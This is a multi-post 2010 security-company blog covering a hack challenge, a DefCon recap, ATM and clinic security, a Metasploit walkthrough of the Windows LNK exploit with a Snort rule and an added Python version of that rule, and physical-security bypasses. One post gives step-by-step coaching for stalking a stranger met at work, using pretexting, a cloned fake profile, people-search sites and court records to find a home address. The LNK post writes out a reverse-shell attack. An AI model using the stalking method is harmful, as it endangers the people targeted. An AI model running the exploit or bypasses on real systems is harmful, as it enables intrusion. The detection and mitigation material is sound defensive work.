Tuesday, August 31, 2010

Hack Challenge? Should Seem More Familiar Than You Think...

It seems a common misconception about our semi-annual Hurricane Labs Hack Challenge (http://www.clevelandhacks.com -- #hackchallenge on Twitter) is that our challenge network is somehow fortified and that we use the challenge to "test defenses". That has never been the case (though it may be a goal in the future). The goal of the Hack Challenge is to highlight actual vulnerabilities and actual exploits we've seen "in the wild" or during our penetration tests, essentially to demonstrate to folks that this stuff is REAL. Our flags, and really the entire competition, are based on real-world things that we know for certain exist, not some theoretical zero day that could happen if the right goat were sacrificed to the right moon goddess on the right night at the right time. They're based on the stuff we've seen on your networks and in your applications. We've always leaned towards the more practical side of life.

So if you're a customer, read your penetration test reports; if not, keep up on the latest information security news to get a taste of the kinds of things you'll see next month. This year's Hack Challenge is scheduled for September 22, 2010 and will be an excellent learning event whether you're watching or participating. Please register at http://www.clevelandhacks.com.


Tuesday, August 17, 2010

Your Information and How I Got It

3:00am. Your phone is ringing off the hook, your Facebook wall is filled with derogatory comments, and there are 27 pizza delivery men waiting at your front door. As you sit in bed sipping your ice-cold Hoffachino with your Macbook propped up on your lap you start thinking to yourself, "How did this happen?" Leave your hat and social security card at the door, welcome to the Internet.

If you're not careful, the victim in this story could be you. In today's world, many people are all too willing to give away information through social media. The main problem with social media is what makes it so appealing in the first place: it's social. Any time you post something online you are inviting your friends, family, and complete strangers to come view your actions. Sure, you may think that you're beating the system by setting all your photos and blogs to private and viewable to "Friends Only", but even that doesn't stop someone who is really dedicated to obtaining your information. A few key spots to start looking for someone are Facebook, MySpace, and oddly enough, even an online phone book.

Now, we'll actually need someone to find: What about the cute barista who smiles at you at the coffee shop every afternoon during lunch? Or the girl at the Dave & Buster's ticket counter who always strikes up a conversation? Maybe even the cashier at the Giant Eagle that's always careful with the eggs when he bags your groceries. Any of these are prime choices for your experiment. Just take a quick peek at their name tag and you've got your first clue. Now that we've got a name, a good place to springboard from would be Facebook. With over 400 million active users, you’re bound to come across someone interesting. So go ahead and type your victim’s name into the search box and we’ll see what comes up. Anything interesting? Hmm, over 500 people are named Emma. Let’s try narrowing this down a bit. You can refine your search by Location, School, and Workplace. Depending on how you found this person in the first place, you have a few options you could utilize. If you’re using one of our examples from earlier, then you will already know where they work. Most of the time you can safely assume that they’ll live in the general area as well.

Usually, this should be enough to find your new friend. But, if that still doesn’t narrow it down enough, you can find out where they go to school through a little social engineering. Next time you order your venti doubleshot soy latte, just casually bend the truth and mention, “Hey, I think I’ve seen you around campus before. Do you go to [INSERT SCHOOL HERE]?” If you’re lucky, maybe they’ll reply, “Oh yeah! I’m a theatre major and I’m taking acting over the summer. What do you study?” Then, perhaps instead of stalking this poor person, you’ll actually strike up a conversation and become friends like a normal person would...but that’s not the point of this article. Let’s say you find their Facebook profile. What do you do next? If their profile is open to the world and you can read anything and everything on it, feel free to skip this paragraph. But, if this person was smart they would at least lock down their profile to some degree. The easy way out is to just add them as a friend and pray they accept you. But, if you wanted to be sneaky (and who doesn't?), you can trick them into adding you. One of the most common aspects of a profile that most people leave alone is the friend list. What you can do is poke around in this person's list of friends and find a profile that IS totally open. From there you can make a dummy account and just copy their details. No need to copy every last detail, just enough to make it look believable. Perhaps a few pictures here and there and just a copy & paste of their main description. With a fake matching account, send a Friend Request to the stalkee and just wait to be accepted.

Now that you have access to this person's account, you have free rein over all the information it holds. You can find personal phone numbers, e-mail addresses, screen names, and even a home address in most cases. Obviously, this is exactly the type of data that can help a would-be stalker like yourself. Using this newfound data, you can try digging a little deeper using Pipl (http://www.pipl.com), a search engine that looks through "the deep web" to find information on people. Pipl will search for and display anything it can find regarding that person on the Internet. Blog posts, news articles, Facebook/MySpace/Twitter profiles, e-mail addresses, screen names, even your home address. They're all fair game for Pipl. What's most shocking is that it will even return any of your government public records listed on the Internet, including court records.

Still hungry like the wolf for "private" data? Well, look no further than Spokeo (http://www.spokeo.com). Much like Pipl, Spokeo gathers information from all sorts of social networks, phone books, and other websites, and compiles it into an intrusive list that would make any creep squeal in excitement. Aside from the basics (name, age, location, web profiles, etc.), Spokeo will also display the residents of a household, the build of the house (room numbers, size, estimated value), the average age, ethnicity, and income of the neighborhood, and a person's interests (it knew that my father "owns a truck"). Scary, right? And that's only what you get for free! Spokeo offers paid subscription models for varying lengths of time that will allow you access to a near limitless amount of information on over 300 million people.

Now, in a perfect world, this person doesn't have a MySpace or Facebook or whatever may be the latest trending social site. But, no matter how anti-social someone is, that won't protect them from the long arm of the law. Let's face it, everyone runs into a little legal trouble sooner or later (come on, you can only hide your tormented Elton John albums for so long). This is when we turn to the master of privacy invasion: Uncle Sam. A nice place to start would be the County Clerk of Courts. Most of them have websites these days, which makes our job much easier than sifting through paper records. For example, let's head over to the Cuyahoga County website (http://coc.cuyahogacounty.us) and find the link for "Civil/Criminal Case Docket" (both take you to the same place). Before you access the database, you'll have to agree to the terms of service. Now, from here you can choose to search through the civil or criminal cases. Personally, I would recommend the civil cases since they're more common. All you need is a first or last name (and time to look through common names) to find a record. Once you find a case, you can view a brief summary of the case, the involved parties, costs, and the docket, which gives you a timeline of the court events. Pretty useful I suppose.

Not specific enough for you? City-level records are usually more incriminating, so let's try to dig a little deeper. Since no one can decide on one universal domain format, you'll have to Google your city's court site ("[CITY NAME AND STATE] Clerk of Courts" works well for me). I'll use Rocky River (http://rrcourt.net) for this demonstration. You'll need to look for the "Public Access" link (or something similar for other sites). You'll notice that most of the search options are the same as the county's; again, all you need is a last name and you'll be swimming in court records. Of course, you can see the usual: involved parties, costs, docket, etc. But what's shocking is the amount of extra information that is made available. Looking at recent records, I can see the height, weight, hair and eye color, race, and even a person's driver's license number and home address. Seems a little unnecessary to me, but I'm not complaining - this can all be useful to someone who would be reading this article.

Lucky for me, aside from becoming a hermit living under a bridge for the rest of your life, there isn't much you can do to keep yourself disconnected. So go ahead, run that red light while you're Tweeting that you're on your way home for the coolest party of the decade. Chances are, I'm already at your front door.


UPDATE:
Alright, so now I'm complaining. After putting the finishing touches on this article and sending it off, literally 2 days later I get pulled over by an officer who allegedly saw me speeding. Sure enough, it was in a district that uses the Rocky River court system to handle these matters. A scan of my ticket showed up online, along with my phone number (thank you Google Voice), home address, and signature. So yes, thanks to "karma" my very own private information is available online. I won't post a direct link to the case, but you should be able to find it if you actually read this article.

So what did I do? What any good hypocrite would: complain. I issued a formal complaint with the magistrate and she directed me to the Clerk of Courts. After dealing with a peon behind the safety of her glass window, I managed to get some time in with the Clerk.


According to good ol' Debbie, I would have to file a motion to have my information removed from the Public Access website. So after waiting about a week, I finally got a letter saying that the motion was granted and everything should be gone. But when I went to check, I noticed my phone number was still listed. Sure, the scanned ticket (which had my signature) is gone, but I paid $10 to have my phone number removed and it's still there. So have fun with that until I talk to Deborah some more. At least I have plenty of options to reach her now.

Moral of the story: Don't break the law. If you do, don't get caught. If you happen to get caught, complain. It won't get you out of a ticket, but at least the world won't be able to call and mock you.

Friday, August 13, 2010

ATMs - Delicious Distributors of Benjamins or The Devil?

We have a saying where I'm from: "once you have physical access to a machine, game is over." Well, ATMs are thought to be special because they are super secure, and physical access is kind of a requirement for them. You would think their manufacturers, providers, customers, someone would demand better security from these literal money machines. Do they?
You decide. Here are a couple pictures that might help you make up your mind:


The first one is courtesy of Rick Deacon (@rickdeaconx on twitter):



I don't know about you but that looks like a Windows blue screen of death. Now I'm not going to go all "anti-Windowsy" on you here but really? To be perfectly honest I'm not sure I'd trust Linux out there on its own to run what is literally a money machine. I think some sort of purpose-built, chip-based OS would be more ideal for running money machines. Eh, what do I know, I only break Windows and Linux machines for a living.


Next up we have my masterpiece, my favorite money machine in the whole wide world, located in a local (to me anyway) eatery:




You might not be able to see it too clearly (I can post a clearer picture later) but yes, yes that IS an antenna sitting there happily as can be on top of it. I thought to myself, 'no way they have it hooked to their "free" wifi'. Guess what? They totally do. Then I thought, "well it has to be encrypted, right?" It is, if WEP is encryption. Apparently it's some sort of "hey, let us park an ATM here and charge your customers a ton of money in fees" deal. Security is secondary of course because I mean, what could you possibly do with the data an ATM sends back and forth? Probably not much, so why protect it?


Tuesday, August 3, 2010

DefCon 18

Last week was the 18th year of DefCon, the hacking convention that takes place in Las Vegas, NV. A colleague and I headed out to the conference with intentions of learning something new. As usual, we were not disappointed.

The conference itself was bigger than ever, clocking in at over 9000 attendees this year. That left the poor helpless Riviera conference rooms overflowing into the hallways. The wait times varied per talk, but the highly publicized talks had the longest lines. The general consensus is that DefCon needs to move to a bigger hotel -- and the complaints were heard. Rumor is DefCon 19 will take place at the Rio Hotel & Casino next year.

Bright and early Thursday morning we were up and out the door to retrieve our badges. This year, the badges consisted of a piece of aluminum carved up with various circuits on them controlling the LCD screen and corresponding buttons on the badge. The LCD screen scrolled through multiple pages at the push of the button. Some of the screens allowed codes to be entered, allowing access to special parties or unlocking parts of the badge. That is the beauty of the DefCon badge, it is completely hackable. This year it was created with a built-in mini-USB port in order to allow easy access to the badge for reprogramming. Information about the badge can be found here.
Thursday concluded with a number of 'n00b talks' including introductions to lock-picking, hardware hacking, and DefCon itself. Also on Thursday were the two other security conferences in Las Vegas, B-Sides and Black Hat. Thursday night, after the DefCon sessions ended, the Security Twits meet-up took place, where many information security people from Twitter came together to discuss various aspects of Black Hat/DefCon/B-Sides.

Friday began the main speaking tracks and talks. The keynote started at 10AM, and the line was out the door and around a few corners for that one. I followed the keynote with a talk about re-exploitation of the now-patched MS09-012 vulnerability. This talk was very interesting in that it gave the workaround needed to exploit this vulnerability again. The original vulnerability allowed impersonating the tokens of privileged users, which is very important in many penetration tests. Token impersonation allows an unprivileged user to gain access to the SYSTEM account, which has the most control over a Windows system. This talk expanded on that vulnerability, stating that Microsoft did not successfully/fully patch the problem, because you still have the ability to exploit IIS 6, 7 and SQL in certain instances. Exploit code was also released with this talk.

The next talk of interest was given by an employee of Qualys, who released a tool to help fingerprint static web applications that had been obfuscated to hide their true identity. This was a short talk but gave a good overview of the tool, BlindElephant, which can be found here.

Two other important talks from Friday were about hacking Oracle and WebSphere via ASP. The WebSphere talk detailed the workarounds needed to perform directory listing on 'patched' vulnerabilities. This, combined with a vulnerability in WAS, allowed file upload and WAR deployment. At that point, you have a shell on the server and most likely have control over it. The Oracle talk was a GREAT help, as there have not been many white papers or talks detailing the proper way to use SQL injection to leverage your way into a shell on a machine using Oracle. Web applications using Oracle are becoming more prevalent, and this talk was a gold mine for a penetration tester. The SQL statements needed to gain a shell on a machine (assuming some other configuration variables exist) were given.

Saturday rolled around and gave us another day of talks... probably some of the most publicized talks as well. Saturday contained both the GSM cell phone hacking and the ATM hacking talks. The GSM hacking talk discussed how to build a call interceptor for a medium-sized coverage area for around $1,000, then demonstrated its abilities on stage. It intercepted about 30 cell phones. This talk gained a lot of press and has many articles about it on the Internet. Many can be found here. The ATM hacking talk outlined the ability to exploit Automated Teller Machines. I did not see this talk due to lines, but there are also many articles about this talk that were published.

The other highlights of Saturday for penetration testers, like myself, were the anti-reversing talk, physical security talk and rebinding attack on home routers. The anti-reversing talk was of a half joke/half serious nature. The talk displayed and described ways to obfuscate code to the point where a reverser who was taking apart your binary would eventually just give up and walk away. The physical security talk walked through how to properly implement and enact a physical security policy on a company that does not have one. It also gave some interesting information on some lesser-known vulnerabilities that occur in physical security situations. The person presenting this talk also seemed to have dealt with many CEO types in his day. As a physical security implementer, this gave him the ability to describe some 'mental weaknesses' that the people who make decisions sometimes have. This gives a penetration tester the edge up. :)

The last talk that really impressed me on Saturday detailed the ability to rebind DNS to home routers (Linksys, Dell, Netgear, etc.) and allowed an attacker to connect to the internal management web interface of these routers from an external source on the Internet. The attack leveraged a server that needed client interaction (i.e., a link clicked) against these routers. It exploits the 'weak end system model' on the IP stack of the vulnerable routers, "which have specifically configured firewall rules, and who bind their Web service to the router's WAN interface". The attack was demonstrated on stage and could open up thousands of home routers to attack and exploitation. The tool and a little better explanation can be found here.

We left to come back to Ohio on Sunday morning, but not without gaining a ton of knowledge and having a bunch of fun in the process.

Note that if you are interested in seeing all the slides/outlines of the talks mentioned as well as the rest of the talks at DefCon, follow the news at http://www.defcon.org, which is where all the talks will be released with both MP3 and video in the coming months.

Wednesday, July 21, 2010

Microsoft LNK Attack and Defense

With the Internet buzzing about the latest Windows exploit against LNK files, I took a chance to look at the topic from an attacker's perspective and also from a defensive perspective. A module for this attack has been added to the Metasploit repository, so we will use it in this example.

First start "msfconsole" and select the LNK module -

use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute


Check the module's options -

show options


We will then select a payload and set the proper addresses for our attack -

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.1
set srvhost 192.168.100.1


Start the exploit server -

exploit


Now that the exploit service is running we will direct our target to the attacking service with an HTTP request. On our target machine we will browse directly to our attacking service using Internet Explorer -


After the target machine connects to our attacking service it will be redirected to a WebDAV share with our LNK file and a payload file (DLL) that will be executed -


Because of the way Windows handles the LNK file, the target does not have to actually click on the file; viewing the file is enough to trigger the exploit. On our attacking machine we can see the target connecting to our service and being successfully exploited -


We can now interact with our target -

sessions -i 3



Now that we have successfully demonstrated an attack, let's take a look at how we can defend against this.

Microsoft has posted some workarounds for this issue -


This attack can also be mitigated at the network level with an IDS/IPS. The following rule was successful in detecting this activity in Snort -

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Windows Shell LNK GET request via WebDAV possible remote exploit"; flow:established,to_server; content:"GET"; http_method; uricontent:".lnk"; nocase; content:"Microsoft-WebDAV-MiniRedir"; http_header; classtype:bad-unknown; reference:url,www.microsoft.com/technet/security/advisory/2286198.mspx; reference:cve,CVE-2010-2568; sid:2011229; rev:1;)
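To make clear what the rule above keys on, here is an added example (not code from the original post, from Emerging Threats or from Snort) that re-implements the rule's three tests in Python and runs them over a few constructed HTTP requests: the method must be GET, the URI must contain ".lnk" in any case (the nocase modifier), and some request header must carry the Microsoft-WebDAV-MiniRedir string. The Host of 192.168.100.1 is the srvhost from the walkthrough; the request bodies are constructed samples, not captures.

```python
"""Re-implements the matching logic of the Snort rule above in plain Python.

The rule fires on an outbound HTTP request when all three hold:
  1. method is GET                                 (content:"GET"; http_method)
  2. the URI contains ".lnk", any case             (uricontent:".lnk"; nocase)
  3. a header carries "Microsoft-WebDAV-MiniRedir" (content:...; http_header)
The Mini-Redirector is the WebDAV client built into Windows, which is what
fetches the .lnk from the attacker's share, so that user-agent on a .lnk
request is the tell.
"""
from typing import Dict, List, Optional, Tuple

RULE_MSG = "ET CURRENT_EVENTS Windows Shell LNK GET request via WebDAV possible remote exploit"
WEBDAV_UA = "Microsoft-WebDAV-MiniRedir"


def parse_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Split a raw HTTP/1.x request into (method, uri, headers); None if malformed."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    method, uri = parts[0], parts[1]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            return None
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def matches_lnk_webdav_rule(raw: bytes) -> bool:
    """True when the request satisfies every condition of the Snort rule."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, uri, headers = parsed
    if method != "GET":                     # content:"GET"; http_method
        return False
    if ".lnk" not in uri.lower():           # uricontent:".lnk"; nocase
        return False
    # http_header matches anywhere in the header block, not only in User-Agent
    return any(WEBDAV_UA in value for value in headers.values())


def scan(requests: List[bytes]) -> List[str]:
    """Return one alert message per matching request, mirroring Snort's msg."""
    return [RULE_MSG for r in requests if matches_lnk_webdav_rule(r)]


# Constructed sample traffic (not real captures), roughly in the order a
# victim browsing the attacker's WebDAV share would generate it.
SAMPLES = [
    # 1. the tell-tale fetch: GET for the shortcut via the Mini-Redirector
    b"GET /share/payload.lnk HTTP/1.1\r\nHost: 192.168.100.1\r\n"
    b"User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7600\r\n\r\n",
    # 2. same client listing the share: not a GET and no .lnk in the URI
    b"PROPFIND /share/ HTTP/1.1\r\nHost: 192.168.100.1\r\n"
    b"User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7600\r\n\r\n",
    # 3. a browser downloading a .lnk by hand: no WebDAV redirector header
    b"GET /share/PAYLOAD.LNK HTTP/1.1\r\nHost: 192.168.100.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0)\r\n\r\n",
    # 4. uppercase extension via the redirector: nocase makes this match too
    b"GET /share/Payload.LNK HTTP/1.1\r\nHost: 192.168.100.1\r\n"
    b"User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7600\r\n\r\n",
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLES, 1):
        print(i, "ALERT" if matches_lnk_webdav_rule(req) else "pass")
```

Samples 1 and 4 alert, 2 and 3 do not; note that sample 3 shows the rule is deliberately narrow, a plain browser download of a .lnk is out of scope for it.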

Here is a screenshot from BASE showing the Snort alert -



Check Point has also released an update that will detect this attack -


Monday, July 19, 2010

Another Day, Another Naughty Doctor's Office


I think I'm going to start a photo-journal of all the unlocked, unattended doctor/nurse/medical assistant workstations. Basically this is similar to http://hlurl.com/fa, but this time I was able to actually talk to the nurse and doctor involved and get their insight. This one is brought to us by a local independent practitioner who I really liked and who might have actually solved a long-standing problem of mine. Unfortunately his office needs some basic security practices put in place, so away we go:

Once again I was left alone in the office and once again a computer (a laptop, no less) was left unlocked right in front of me. The big difference here is that the medical application was left open and I could've "explored" all of their patient records. This is obviously less than desirable. This was the nurse's workstation; when he returned I asked him about it. The response was my personal favorite that my guys use when I catch them doing something stupid: "I usually never do that." After I was done rolling my eyes I explained what I do for a living and he said "okay, I'm busted." The next time he left the room, he took the laptop with him.

I was then ushered into another room where I got to wait for the doctor. He comes in, with his laptop, sits down and logs in. About 10 minutes into the exam he left the room to get some supplies. Guess what? That's right, laptop left in the room, logged into the medical app. When he returned, I explained what happened with his nurse and then what just happened with him. He then went on to explain that "EMRs (Electronic Medical Records) are already a pain in the ass, now I have to worry about this laptop." Apparently when you lock this workstation it logs you out of the medical app too so that's his pain point. He has to log in twice if he locks it, once into the computer and once into the application.

The choices here are pretty clear cut. Log in twice or expose all of the patient records to anyone sitting in the office. Perhaps the app is capable of single sign on with the OS? Not sure what the easier answer is but it can't be to just leave the workstation there unlocked and unattended. It makes me sad that the latter is probably what most people will choose.



Physical Security -- Some Quick Observations

Physical security is something we take seriously at Hurricane Labs for both ourselves and for our customers. Lately, the penetration testing team has been researching how to exploit some vulnerabilities that many office-type settings have. Here are just a few examples of what we uncovered.

Doors - Typical office doors can, for the most part, be opened from the inside without a key, and they often have a lever-style handle rather than a knob. There is a vulnerability in these types of doors that would allow a person to open the door by sliding a metal tool under it and using the tool to pull down on the handle. An example demonstration of this can be found here. This tool only works when there is sufficient space under the door for it to slide... so the key to fixing this issue is to limit the gap between the floor/carpet and the door.
Another door issue that remains is good old lock-picking. Pick proof locks help out here.

Motion Detectors - Many can be subverted by moving slowly, holding a large object in front of you or crawling low to the ground. Your results may vary, but these simple techniques will often get you past many motion sensors. The fix for this would be to upgrade your motion sensors, raise the sensitivity of the sensors and adjust the angle and view that the sensors have.

Alarms - Many door alarms are comprised of two magnets, one on the frame of the door and one on the door itself. When the magnets are 'connected' or attracted together (i.e. door closed), they form a sort of circuit. When the circuit is broken (door opened), the alarm goes off. A very simple way to exploit these systems is to put a strong magnet on the door frame magnet. This will keep the circuit closed and will not set off the alarm when the door is opened. Upgrading the door alarm triggers and disabling any access to the magnets themselves would hinder this exploit.

That's all for now. More to come as we dig deeper.